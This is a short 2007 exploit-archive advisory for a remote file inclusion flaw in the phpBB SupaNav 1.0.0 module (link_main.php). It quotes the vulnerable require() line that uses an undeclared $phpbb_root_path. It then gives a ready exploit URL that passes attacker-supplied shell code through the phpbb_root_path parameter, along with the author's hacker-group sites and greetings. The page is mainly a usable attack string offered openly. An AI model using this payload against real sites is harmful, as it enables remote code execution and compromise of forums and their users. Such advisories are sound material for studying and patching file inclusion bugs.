[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : phpBB Module SupaNav 1.0.0 (link_main.php) RFI Vulnerability
# Published : 2007-07-18
# Author : bd0rk
# Previous Title : BBS E-Market (postscript.php p_mode) Remote File Inclusion Vulnerability
# Next Title : A-shop <= 0.70 Remote File Deletion Vulnerability


phpBB Module SupaNav 1.0.0 (link_main.php) Remote File Inclusion Vulnerability


Vendor: http://www.phpbbhacks.com/download/8003

Download: http://www.phpbbhacks.com/load.php?id=8003

Founder: bd0rk

Website 1: www.soh-crew.it.tt

Website 2: www.school-of-hack.net

Contact: bd0rk[at]hackermail.com

ICQ: 249-613-511

Greetings: str0ke, TheJT, rgod, Kacper, GolD_M

Vulnerable Code in link_main.php:

--------------------------------------------------------------------------------------

require($phpbb_root_path.'language/lang_'.$userdata['user_lang'].'/lang_nav.'.$phpEx);

--------------------------------------------------------------------------------------

$phpbb_root_path is not declared before require

[+]Exploit: http://[target]/[directory]/link_main.php?phpbb_root_path=[ShellCode]


####The 18 years old german Hacker bd0rk####

# www.Syue.com [2007-07-18]